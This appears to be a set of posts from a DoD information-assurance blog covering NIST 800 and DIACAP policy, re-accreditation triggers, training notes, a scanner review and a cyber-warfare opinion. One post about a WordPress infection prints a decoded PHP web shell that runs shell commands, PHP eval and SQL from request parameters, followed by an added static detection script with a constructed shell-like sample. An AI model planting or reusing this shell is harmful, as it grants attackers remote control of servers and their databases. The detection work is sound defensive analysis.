NIST 800: DoD Risk Management Framework

There are a couple of defense policies reflecting the DoD's move to NIST 800 standards: the Defense Acquisition Regulation Supplement (DFARS 2011-D039) and CJCSI 6510.01, Information Assurance and Support to Computer Network Defense.

Defense Acquisition Regulation Supplement (DFARS 2011-D039)
Defense contractors will have to meet the NIST Special Publication 800-53 security controls. Most large defense contractors have already started meeting defense controls for DIACAP (which are very similar to NIST 800 controls).
More info at firegovernment IT.

CJCSI 6510.01, Information Assurance and Support to Computer Network Defense
The new 6510.01F replaces the old 6510.01E. The document refers to changes in the name of the Information Assurance Manager (IAM) to Information System Security Manager (ISSM) and the Information Assurance Officer (IAO) to Information System Security Officer (ISSO). The name Designated Accreditation Authority (DAA) is changed to Authorizing Official (AO). The former DIACAP term "certification" is changed to the 800-37 term "assessment".

Updates titles for Designated Accrediting Authority (DAA) to Authorizing Official; Information Assurance Manager (IAM) to Information Systems Security Manager (ISSM); and Information Assurance Officer (IAO) to Information Systems Security Officer (ISSO) to align with CNSSI No. 4009 (reference e) terms. Replaces term certification with assessment and accreditation with authorization (to operate) in alignment with CNSSI No. 4009 (reference e) terminology. The new terms are followed by legacy terms in parentheses throughout instruction.

The document also refers to the coming changes to DoD 8500 policies. The changes will focus on NIST 800:

Select security controls IAW DODI 8500.2 (reference g). Note: The next update to DODI 8500.2 (reference g) and DODI 8510.01 (reference i) will direct DOD IS categorization and security control selection IAW CNSSI No. 1253, "Security Categorization and Control Selection for National Security Systems" (reference ill) with additional specific guidance on the DIACAP Knowledge Service. DODI 8500.2 (reference g) and DODI 8510.01 (reference i) will also direct the use of security controls in NIST SP 800-53, "Recommended Security Controls for Federal Information Systems and Organizations" (reference kkk) with supporting validation procedures in NIST SP 800-53A, "Guide for Assessing the Security Controls in Federal Information Systems and Organizations" (reference lll), and additional DOD guidance published in the DIACAP Knowledge Service.

The ultimate goal will be to move away from "Certification & Accreditation" and to a "Risk Management Framework" as in NIST SP 800-37:

NIST SP 800-37, "Guide for Applying the Risk Management Framework to Federal Information Systems" (reference mmmmm), provides guidelines for applying the Risk Management Framework to include conducting the activities of security categorization, security control selection and implementation, security control assessment, information system authorization, and security control monitoring.

When does a DoD Information System require a re-accreditation?

How do you determine when a DoD Information System should have a full re-accreditation?

We are not talking about the obvious:
- 3 year expiration
- completely new version and/or overhaul of a system

We are talking about a single client within an Information System getting an upgraded operating system, or a firewall being upgraded, or the addition of 4 Cisco internetworking devices and a VLAN change.

How do we know what is a basic sustainment change, a configuration management change (approved by the Configuration Control Board members), or a full-blown 100,000 dollar re-accreditation?

You would think there was some kind of matrix that could match up modifications to a DoD IS with what actions must be performed. If there is one, I have not seen it.

All we have are high-level regs that tell us IA Workforce peons (who must deal with details, schedules and limited funds) almost nothing we don't already know.

Assessing the IA Impact & Maintaining Situational Awareness:
DoD 8500.2, Information Assurance, gives us IA Controls such as DCII-1, dealing with IA Impact Assessment. It states, "Changes to the DoD information system are assessed for IA and accreditation impact prior to implementation." The DoD instruction also tells us that we are supposed to conduct comprehensive annual reviews of our systems' processes, procedures and IA Control status.

How are we supposed to monitor "Changes to the DoD information system"?

We know that we are supposed to monitor all DoD IS's to keep track of the baseline. And according to the regs, we are supposed to do this by a configuration management process (DCPR-1, CM Process). That configuration management process is supposed to have a "configuration control board that implements procedures to ensure a security review and approval of all proposed DoD information system changes, to include interconnections to other DoD information systems."

So Configuration Management gives us oversight of changes to DoD IS, but who within the CM process determines whether changes to a system should trigger a re-accreditation?
IA Control DCCB-2, Control Board, tells us that "all information systems are under the control of a chartered Configuration Control Board that meets regularly according to DCPR-1." It also tells us that the Information Assurance Manager (IAM) is a member of the CCB.

From my interpretation of these high-level statements, the IAM is the subject matter expert who has a lot of say-so on the IA impact of modifications to a given DoD IS.


I did not find anything on that in 8500.2, so I moved on to CJCSI 6510.01, but it only says the same things that 8500.2 says (Configuration Management, CCB, having a baseline). It did, however, say this:

"Ensure a configuration management (CM) process is implemented and establish appropriate levels of configuration management to maintain the accredited security posture. The security impact of each change or modification to an information system or site configuration will be assessed against the security requirements and the accreditation conditions issued by the DAA."

Still pretty high level, but we are getting closer, since the instruction is telling us: "impact of each change or modification to an information system or site configuration will be assessed against the security requirements and the accreditation conditions issued by the DAA".

I thought that the only way to get more insight was to look at the lower-level regulations within specific branches. The Air Force's Certification & Accreditation Program, 33-210, for example, talks specifically about reaccreditation. It states that the Information System Owner (ISO) "Alerts AFNetOps of any changes to the topology or software affecting the security posture of the enclave boundaries so that the gateway package can be reaccredited if necessary." And in table 3.2 it states "PM/SM/ISO will enter information in EITDR, host an initial stakeholder meeting, and initial security review to determine if a new version is to be created." It mentions different reaccreditation actions for networked and standalone systems. It goes on to say that "if changes will not affect the security posture of the IS, the PM/SM/ISO will annotate the outcome of the meeting and make necessary edits to the C&A package."

The Army's AR 25-2, Information Assurance regulation, has an entire section on Accreditation & Reaccreditation (5-5), but still offers no specifics. The Army does have AR 380-19, AIS Information System Security, and it is pretty specific (see excerpt below), but it is now OBSOLETE and replaced by AR 25-5.

All regulations and instructions are in line as far as the need to reaccredit if there is an IA IMPACT, but there are no specifics on what constitutes an "IA Impact". 8510, DIACAP, mentions that the IA posture of an IS must remain acceptable in order to retain its Authorization to Operate (ATO). If I were the IAM for a day, I would hang my hat on this important statement.

We have to work with what we have!!
Based on what we have:
Changes in a DoD IS's IA Controls determine whether or not a system will need a reaccreditation. There are no specifics on what can force a reaccreditation. So we must conclude that there is no "magic bullet" that will instantly create the need for a reaccreditation. In other words, no modification to a certain piece of hardware or software or certain subsystems, or even changes to the network architecture, will be the reason for reaccreditation every single time.

Significant changes to IA Controls are the only thing we can really put our finger on.

So let's say that IA Control DCCS-2, Configuration Specification, was changed on an Information System. This IA Control deals with making sure that all IA-enabled and IA products have the DISA Security Technical Implementation Guides (or equivalent) applied. Maybe an example will help us understand the process of determining reaccreditation: A DoD Information System Owner requests the addition of four new storage devices to the system enclave. Let's say that these storage devices will have an adverse effect on the security posture of the overall system because they are not in compliance with DCAS-2, Acquisition Standards, so the storage devices have not gone through NSA/Common Criteria evaluation. Additionally, the storage devices will not be compliant with DCCS, which means they will not have security configured in accordance with DISA/NSA checklists and guidance.

Prior to being implemented or even tested, the request for this change should go through the configuration management process, where the IAM will tell the Program Manager and System Owner (or their representative) the security impact to the overall system. He or she would have to explain to them that the change may affect the current ATO, because they will now be non-compliant on two (possibly more) controls that were previously compliant. The IAM would also be wise to get in contact with other subject matter experts, such as the system administrator and/or IAO who would be in charge of implementing and testing the system. The IAM might also contact the Certifying Authority (or representative) to determine if such a change would create the need for a reaccreditation.

One thing the IAM does NOT want to do is simply sign the Program Managers and System Owners up for changes to the system that would jeopardize the Authorization to Operate. The IAM should do their homework and present the real risk of the modifications to the system owner. CYA is paramount.

Once the IAM determines the impact, and the modifications are made:
According to DoD 8500.2, 5.8.5, "ensure that IA-related events or configuration changes that may impact accreditation are reported to affected parties, such as Information Owners and DAAs of interconnected DoD information systems."

Some older regulations are more specific. AR 380-19, AIS System Security for example:
3-6. Reaccreditation

a. All AIS, except those designated as nonsensitive, will be formally reaccredited within 3 months after any of the following occurs:

(1) Addition or replacement of a mainframe or significant part of a major system.

(2) A change in sensitivity designation (para 2-2a).

(3) A change in security mode of operation (para 2-2b).

(4) A significant change to the operating system or executive software.

(5) A breach of security, violation of system integrity, or unusual situation that appears to invalidate the accreditation.

(6) A significant change to the physical structure housing the AIS that affects the physical security described in the accreditation.

(7) Three years has elapsed since the effective date of the existing accreditation.

b. Reaccreditation will include the same steps accomplished for the original accreditation; however, those portions of the documentation that are still valid need not be redone.

AR 380-19 has been replaced with AR 25-5 which is pretty high level.

UPDATED IA STUFF + Procrastination

My greatest skill is procrastination. I really am the best, most skilled procrastinator I know. It takes all of my will power to stay consistent with anything, including this blog, which is why (among other things) I am not banking like Darren Rowse or Steve Pav, two of my favorite bloggers.

YOU SEE, I am such a good procrastinator that I JUST procrastinated on getting to the REAL subject of this article: security, IA updates.

A fellow IA Analyst wrote me with questions that got right to the heart of IA… change.

She asked about AFI 33-202.
And I said:

Right as I felt I had mastered the contents of 33-202, the Air Force moved to 33-210 (to replace all its C&A stuff). I believe 33-202 is now obsolete and replaced with 33-200 & 33-202 and others, last time I was with the AF, anyway.

What about IT LEAN?
I said:

As for IT Lean, you can find that on AF Knowledge Now site and I think they have links to it on EITDR. If you are interested in IT Lean you’ll be REALLY interested in 33-210:

But if you are working with the Air Force and want more on the IT LEAN process you should be digging into AFCAP, Air Force Certification & Accreditation Program, an AF version of IT Lean.

CNSS 1253:
A lot of people also ask me to send them a copy of the CNSSI 12-53. But it is actually OUT. It's the CNSSI 1253. I, personally, have not had any clear direction (currently NO direction) on how to start moving some of the CNSSI to the systems I work on. I suspect that the Govt. will start this within the next couple of years and start phasing out DIACAP, but who the hell knows what a bureaucracy of their size will do next!

Lastly, my fellow IA Analyst asked me about EITDR
and I said:

You'll find the EITDR POCs on the Air Force Portal or Knowledge Now. Log on to the Air Force Portal (if you don't have an account, get one; you may have to get sponsored by the Govt to get it). Once on the AF Portal, search for EITDR and they'll have tons of stuff on it. Waaaaay more stuff than you want to read. You'll also find the person you need to start the EITDR process with.

Server at Magic Requires Username Password

The WordPress “Magic” hack!

If you're getting this message: "The server (your server domain, e.g. DOMAIN.COM) at Magic requires a username and password", then you likely have infected code in your WordPress blog.

Wordpress Magic Attack

WordPress user Yokima reported this very slick hack.

And the fix is to update your blog. This will fix the issue. Make sure you change your password if you actually put your information in that "server at Magic" message box. Although updating the WordPress blog definitely fixes the issue, you may have to reload your plugins too, because they may also have some infected code. Doing further research on this matter.

*Similar issues reported by techartistserver as "Fuzz Access requires a username and password."

This is what the infected code looks like after the malware injection into your blog... yep... ugly!

From RocketWood:
We noticed that the code injected into the files was run through an eval and a decode, so we decoded the string and found this PHP code:


```php
// Decoded payload as posted by RocketWood. The braces lost in extraction have
// been restored; nothing else about its behaviour has been changed. Comments
// point out the traits a defender can use to recognise this family of shell.
if (!function_exists('______safeshell')) {

    // Tries every command-execution primitive PHP offers, skipping the ones the
    // host lists in disable_functions. The probe of disable_functions followed
    // by this passthru/system/shell_exec/exec/popen cascade is a strong web-shell
    // signature on its own.
    function ______safeshell($komut) {
        $disable_functions = array_map('trim', explode(',', ini_get('disable_functions')));
        if (!empty ($komut)) {
            if (function_exists('passthru') && !in_array('passthru', $disable_functions)) {
                //@ ob_start();
                @ passthru($komut);
                //$res = @ ob_get_contents();
                //@ ob_end_clean();
            } elseif (function_exists('system') && !in_array('system', $disable_functions)) {
                //@ ob_start();
                @ system($komut);
                //$res = @ ob_get_contents();
                //@ ob_end_clean();
            } elseif (function_exists('shell_exec') && !in_array('shell_exec', $disable_functions)) {
                $res = @ shell_exec($komut);
                echo $res;
            } elseif (function_exists('exec') && !in_array('exec', $disable_functions)) {
                @ exec($komut, $res);
                $res = join("\n", $res);
                echo $res, "\n";
            } elseif (@ is_resource($f = @ popen($komut, "r"))) {
                //$res = "";
                while (!@ feof($f)) {
                    //$res .= @ fread($f, 1024);
                    echo(@ fread($f, 1024));
                }
                @ pclose($f);
            } else {
                // This line is garbled in the posted decode and is left as found.
                $res = {$komut};
                echo $res;
            }
        }
    }
}

// Request handler. A long hex-looking parameter name is the trigger and "cmd"
// carries the payload; the three modes are eval of PHP, a shell command, or a
// SQL query run through WordPress's own database handle ($wpdb->dbh). The
// get_magic_quotes_* checks just undo PHP's old automatic slash-escaping.
if (isset ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'])) {
    echo "\n";
    if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'eval') {
        eval(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
    } else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'exec') {
        ______safeshell(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd']);
    } else if ($_REQUEST['php_bdb7e9f039f4c7d9100073e131610a87'] == 'query') {
        $result = mysql_query(get_magic_quotes_gpc() || get_magic_quotes_runtime() ? stripslashes($_REQUEST['cmd']) : $_REQUEST['cmd'], $wpdb->dbh);
        if (!$result) {
            echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_FAILED: ", mysql_error($wpdb->dbh), "\n";
        } else if (is_resource($result)) {
            $res = array();
            while ($row = mysql_fetch_assoc($result)) {
                $res[] = $row;
            }
            echo serialize($res);
        } else {
            // "$wbdb" (sic) is a typo in the injected code itself; left as found.
            echo "php_bdb7e9f039f4c7d9100073e131610a87_result_MYSQL_QUERY_SUCCEEDED: ", mysql_affected_rows($wbdb->dbh), " rows affected\n";
        }
    }
    echo "\n\n";
}
```
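As an added example that is not part of the post or of RocketWood's write-up, the script below does the "decode, then inspect" step statically: it peels eval(base64_decode(...)) layers (with or without a gzinflate() in between) in Python rather than through PHP's eval, so nothing from the file is ever executed, and then scores the decoded text for the traits visible in the shell above (the disable_functions probe, the passthru/system/shell_exec/exec/popen cascade, eval of $_REQUEST data, request-driven mysql_query, and the get_magic_quotes unwrap). The indicator names, the verdict thresholds and both sample files are constructed for the example; the infected sample only imitates the shell's structure and is not the real payload.

```python
"""Static unwrap-and-scan for eval(base64_decode(...)) injections in PHP files.

Added example (not from the original post or from RocketWood). It decodes the
wrapper layers without executing anything and scores the decoded text for the
web-shell traits seen in the posted code. Sample files below are constructed.
"""
import base64
import re
import zlib

# eval(base64_decode("...")) with an optional gzinflate() layer in between.
WRAPPER_RE = re.compile(
    r"""eval\s*\(\s*(gzinflate\s*\(\s*)?base64_decode\s*\(\s*['"]"""
    r"""([A-Za-z0-9+/=\s]*)['"]\s*\)\s*(?(1)\))\s*\)""",
    re.IGNORECASE,
)

# Traits of the decoded shell shown in the post (the names are ours).
INDICATORS = {
    "disable_functions probe": re.compile(r"ini_get\s*\(\s*['\"]disable_functions['\"]"),
    "shell primitive call": re.compile(r"\b(passthru|shell_exec|system|exec|popen)\s*\("),
    "eval of request data": re.compile(r"eval\s*\([^;]*\$_(REQUEST|GET|POST)\b"),
    "request-driven SQL": re.compile(r"mysql_query\s*\([^;]*\$_(REQUEST|GET|POST)\b"),
    "magic_quotes unwrap": re.compile(r"get_magic_quotes_(gpc|runtime)\s*\("),
}


def unwrap(source: str, max_layers: int = 8):
    """Peel eval(base64_decode(...)) layers statically. Returns (text, layers)."""
    text, layers = source, 0
    while layers < max_layers:
        m = WRAPPER_RE.search(text)
        if not m:
            break
        raw = base64.b64decode(re.sub(r"\s+", "", m.group(2)), validate=False)
        if m.group(1):                       # gzinflate() expects a raw DEFLATE stream
            raw = zlib.decompress(raw, -15)
        decoded = raw.decode("utf-8", errors="replace")
        text = text[:m.start()] + decoded + text[m.end():]
        layers += 1
    return text, layers


def scan(source: str) -> dict:
    """Unwrap, then report which indicators fire and an overall verdict."""
    text, layers = unwrap(source)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    if len(hits) >= 3 or "eval of request data" in hits:
        verdict = "webshell"
    elif hits or layers:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"layers": layers, "indicators": hits, "verdict": verdict}


def wrap(php: str, inflate: bool = False) -> str:
    """Build one wrapper layer the way the injector does (constructed samples only)."""
    raw = php.encode()
    if inflate:                              # raw DEFLATE, what PHP's gzinflate() reads
        c = zlib.compressobj(9, zlib.DEFLATED, -15)
        raw = c.compress(raw) + c.flush()
    b64 = base64.b64encode(raw).decode()
    return 'eval(%sbase64_decode("%s")%s);' % (
        "gzinflate(" if inflate else "", b64, ")" if inflate else "")


# Constructed payload imitating the posted shell's traits (NOT the real payload).
SAMPLE_SHELL = """if (isset($_REQUEST['cmd'])) {
    $d = array_map('trim', explode(',', ini_get('disable_functions')));
    if (function_exists('passthru') && !in_array('passthru', $d)) { @passthru($_REQUEST['cmd']); }
    eval(stripslashes($_REQUEST['cmd']));
}"""
INFECTED_FILE = "<?php\n" + wrap(wrap(SAMPLE_SHELL)) + "\n?>"   # two nested layers
CLEAN_FILE = "<?php\n/* constructed theme header */\nget_header();\n?>"

if __name__ == "__main__":
    for name, content in (("infected", INFECTED_FILE), ("clean", CLEAN_FILE)):
        print(name, scan(content))
```

To use it on a real install, read each .php file under wp-content (plugins and themes are where this injection lands) and pass its text to scan(); a "webshell" verdict on a file that has no business containing eval is the signal to reinstall that plugin or theme from a clean copy, which is the plugin-reload step the fix above mentions.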




p.s.: don't feel too bad, even the security masters get hacked by malicious S.O.B.'s.

GFI LANGuard – Review

GFI Languard Network and Security Scanner

I was given the honor of reviewing the GFI LANguard network and security scanner. Right off the bat I noticed that the interface is very intuitive & easy to use, which is important to a busy security professional who has better things to do with their time than fight with a messy security tool.

The network scanning tool I normally use is called Retina.
When lining the two up, I have to say Retina is much more powerful, with many more options built in. It can drill way down and do intrusive scans, where GFI LANguard v9 is pretty vanilla. It gives you what you need and that is it.

The simplicity could be an advantage to a system admin doing a security job, because it really is straight to the point. The cost is definitely an advantage. GFI LANguard is about ½ the cost of the Retina scan tool.

Retina Professional Edition 16 IP Pack – $995.00

GFI LANguard goes for about $300+ for 10 licenses.

Nessus is considered one of the best network scan tools, but it's more expensive than both.

What I really like about Retina is that it allows you to scan in accordance with Department of Defense standards, SANS, and others. LANguard does look at the SANS Top 20 report vulnerabilities.

If you're looking for a basic, down-to-earth network & security scanner for your small to medium business needs, then GFI LANguard is definitely the way to go, because you will not beat the cost for the quality and support you get. It's going to give you a thorough assessment of your systems and even tell you how to fix them. Buy this product!

DIACAP Essentials + IA Control Validation Training (part 4): DIACAP/AFCAP Day 4 & 5

UPDATE: 2014 – Risk Management Framework for DOD IT released.

Days 4 & 5 bring the DIACAP/AFCAP Essentials class to a close. The biggest things I learned were: CNSSI 4009 is the official glossary of DOD IA; there is a big difference between theory, policy and practice; Agents of the Certifying Authority (ACA) are official validators; and there is a difference between acquisition Mission Criticality and IA MAC levels.

Stuff I learned from people in the class:

- AFCA is changing its name (to what?)
- DOD is going to put the new IA controls in NCSSI 12-53 (currently in draft)
- a lot of what I need in there is in NIST 800-53
- Marines use something called Exacta
- Site called
- 33-202 is now completely irrelevant and obsolete (not even mentioned ONCE in the class)
- Feds call Certification & Accreditation (C&A) "Security authorization" (NIST SP 800-37)

Day 4:

- Validator Activities & Issue Accreditation Decision
- Prepare POA&M
- Validate Results/Scorecard
- Make certification determination
- CA/DAA Package review

Day 5:

Validation procedures were discussed. On day five, we looked at how the validators look at a system.

I thought it was interesting. It should help me get through the EITDR/DIACAP process more easily.

- Maintain Situational Awareness
- Maintain IA Posture
- Conduct Review
- Retire system

DIACAP Essentials + IA Control Validation Training (part 4): DIACAP/AFCAP Day3

UPDATE: 2014 – Risk Management Framework for DOD IT released.

Day 3 heats up a little. We start talking about what it takes to actually get validated. The DIACAP Implementers Guide & the DIACAP Validators Guide are opened up and reviewed. I think we all learned a little something during this discussion, because there have been some challenges with this. Unfortunately, we don't go too far into the validator stuff.

Day 3:

- DIACAP Structure
- Terminology Review
- Assemble DIACAP Team
- Registered System/System Information Profile
- Assign IA Controls
- Initiate DIACAP Implementation Plan

DIACAP Essentials + IA Control Validation Training (part 2): DIACAP/AFCAP Day1

This is the second installment of the DIACAP Essentials journal.

In the first day of class we’ve taken a high level look at the big picture of the Department of Defense Information Assurance Certification & Accreditation Process (DIACAP) and Air Force Certification & Accreditation Program (AFCAP). It is a very valuable tool for a beginner.

Since I’ve gone through the entire process (with a legacy system) more than once through all the growing pains of Air Force C&A from DITSCAP to DIACAP, I found that I knew about 90% of everything taught. I don’t mind having a refresher, though and quite frankly, I need the CPE’s for my CISSP :).

There were a couple of golden nuggets that I’ve been able to get out of some of the old timers. I learned some interesting things about how the Navy, Marines and Army do things.
The Navy (as weird as their dumb ass rank system.. yep, I said it.. it's dumb) has like three systems: DITPR-DON, DA-DUMB and some other BS; the Marines have something called Exacta; and the Army has APMS (Army Profile Management System). I also learned cool off-topic stuff like the history of eMASS.

I must admit I’m looking forward to day two.
pros of day 1: Good solid start on basics, GREAT for beginners. SecureInfo gets mad props for having a great instructor, John M. (don't know if he wants his full name published, but he's highly, highly knowledgeable and very positive).

cons of day 1: Right off the bat I am noticing a huge hole in the training: a lack of in-depth teaching of EITDR, which is how the Air Force implements, manages and maintains the entire DIACAP/AFCAP process. I don't really see how you can teach one without the other these days. I guess contractually SecureInfo cannot touch it, since some other company has the contract. But unfortunately, the folks that are new to this are going to suffer, because if they go to this class without knowing EITDR they will know why but not how, and if they go to the EITDR class without knowing DIACAP they will know how but not why.

DIACAP Essentials + IA Control Validation Training (part 1)

UPDATE: 2014 – Risk Management Framework for DOD IT released.

I’ve been scheduled to go to DIACAP Essentials + IA Control Validation training. It is the same training that is given to validators at AFCA, so I guess it is pretty serious stuff. I was very reluctant to go until I realized that I actually really need the CPE’s to maintain my CISSP.

Since I’ve been doing the DIACAP stuff for about 2 years now, I’m not certain there is any new information for me to learn.

DIACAP Essentials
The Department of Defense Information Assurance Certification and Accreditation Process (DIACAP) Essentials course blends lecture and hands-on exercises to introduce students to DIACAP policy (to include FISMA requirements of a comprehensive, repeatable, and auditable Information Security process).

IA Control Validation In-Depth – 3 Days
The IA Control Validation In-Depth course takes the student's DIACAP education and turns the view from an implementor to a Validator perspective and involves the students in the validation process for the IA Controls (DoDI 8500.2).

What I am hoping to get from the course is a better handle on the FISMA process. I don't feel like I really have a handle on what is supposed to happen with it.

You Hack US, We Nuke You!

The United States’ top commanding officer for the space and cyber domains told reporters last week that a cyber attack could merit a more conventional military response.

During a press briefing on Thursday, U.S. Air Force General Kevin Chilton, who heads the U.S. Strategic Command, told reporters that top Pentagon advisors would not rule out a physical attack on any force that attacks the United States through the Internet. Currently, the military's networks are probed thousands of times a day, but the goal of attackers seems to be espionage, not to take down critical networks, he told reporters.

– Security Focus

I don’t believe that military force is the equivalent action for a cyber attack. Arrest and/or apprehension is the physical response necessary for criminal hackers attacking from other countries. Cyber counter-attacks are the correct response for government funded & coordinated attacks.

I think if the U.S. reciprocates a cyber attack x10 when other countries are playing little games, we'd get our message across effectively. We should do so in a well-funded and covert way in which the enemy has NO DOUBT that the face slap came from a U.S. hand, but no proof at all, allowing plausible deniability. It should be black ops hacks, very well coordinated, very well funded and full time.

I don't think the US can be complacent or recklessly meek in matters of cyber warfare. Instead, it must be fair, quiet and heavy-handed when it comes to one of its most valuable assets, information.
